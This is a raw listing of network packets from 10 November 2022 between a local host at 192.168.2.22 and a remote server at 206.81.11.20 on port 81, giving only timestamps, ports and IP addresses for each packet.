Nov 10, 2022 11:43:12.069845915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069888115 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069922924 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.069931984 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069976091 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070002079 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070017099 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070064068 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070080042 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070107937 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070148945 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070169926 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070192099 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070234060 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070254087 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070277929 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070321083 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070342064 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070363998 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070409060 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070451975 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070467949 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070498943 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070558071 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070569038 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070600986 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070615053 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070641994 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070684910 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070703030 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070727110 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070771933 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070786953 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070816040 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070858955 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070868969 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.070931911 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.070976019 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071008921 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071044922 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071052074 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071058989 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071086884 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071109056 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071135044 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071177959 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071193933 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071218967 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071261883 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071285009 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071307898 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071350098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071365118 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071393013 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071435928 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071450949 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071476936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071521044 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071540117 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071563959 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071609974 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071626902 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071652889 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071695089 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071711063 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071737051 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071779966 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071794033 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071821928 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071865082 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071887016 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071907043 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071950912 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.071966887 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.071994066 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072037935 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072058916 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072084904 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072128057 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072143078 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072170973 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072215080 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072230101 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072257042 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072278023 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072300911 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072345018 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072365999 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072386026 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072429895 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072468042 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072472095 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072515965 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072539091 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072557926 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072602987 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072626114 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072647095 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072690010 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072705030 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072731972 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072773933 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072789907 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072815895 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072858095 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072885036 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.072901964 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072948933 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072990894 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.072997093 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073033094 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073048115 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073076963 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073118925 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073134899 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073159933 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073200941 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073221922 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073242903 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073283911 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073316097 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073327065 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073343992 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073369026 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073410988 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073421955 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073451042 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073493004 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073503017 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073532104 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073574066 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073582888 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073615074 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073657036 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073667049 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073700905 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073741913 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073751926 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073782921 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073822975 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073854923 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073894978 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073906898 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073935986 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.073983908 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.073990107 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074026108 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074045897 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074062109 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074099064 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074119091 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074135065 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074172020 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074196100 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074208021 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074244022 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074264050 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074280977 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074296951 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074316978 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074335098 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074353933 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074392080 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074405909 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074426889 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074462891 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074469090 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074498892 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074517012 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074533939 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074568987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074588060 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074604988 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074640036 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074673891 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074676991 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074719906 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074727058 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074755907 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074794054 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074809074 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074829102 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074865103 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074882984 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.074956894 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.074995041 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075023890 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075031996 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075072050 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075097084 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075108051 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075143099 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075156927 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075177908 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075212002 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075225115 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075248003 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075284958 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075297117 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075320959 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075357914 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075373888 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075395107 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075429916 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075447083 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075467110 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075503111 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075514078 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075539112 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075576067 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075612068 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075634956 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075649977 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075689077 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075722933 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075723886 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075762033 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075762033 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075774908 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075798035 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075834990 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075856924 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075871944 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075907946 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075927019 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.075944901 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.075982094 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076000929 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.076015949 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076054096 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076072931 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.076090097 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076126099 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076143980 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.076163054 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076200008 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076216936 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.076236963 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076272964 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076293945 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.076308012 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076345921 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076375961 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.076384068 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076421022 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076440096 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.076457024 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076493979 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076517105 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.076530933 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076570034 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076586962 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.076605082 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076642990 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.076659918 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.080866098 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.081211090 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.105583906 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.105659008 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.105700970 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.105721951 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.105742931 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.105784893 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.105796099 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.105827093 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.105870962 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.105885029 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.105912924 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.105956078 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.105966091 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.105998039 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106039047 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106053114 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.106086016 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106127977 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106137991 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.106169939 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106213093 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106221914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.106254101 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106296062 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106306076 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.106338024 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106378078 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.106396914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.140566111 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.141113997 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.179826021 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.179929018 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.242862940 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.243066072 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:13.531550884 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:13.633265018 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.633483887 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:13.634356022 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:13.735889912 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902316093 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902385950 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902487040 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902528048 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902530909 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:13.902566910 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902579069 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:13.902606964 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902643919 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902653933 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:13.902683973 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902720928 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902725935 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:13.902759075 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:13.902801037 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:13.917857885 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.004046917 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004121065 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004194021 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004242897 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004246950 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.004287004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004298925 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.004329920 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004374981 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004381895 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.004415989 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004457951 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004467964 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.004502058 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004544973 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004575014 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.004587889 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004631042 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004638910 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.004673004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004714012 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004733086 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.004754066 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004795074 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004807949 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.004837036 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.004887104 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.019257069 CET	81	49173	206.81.11.20	192.168.2.22
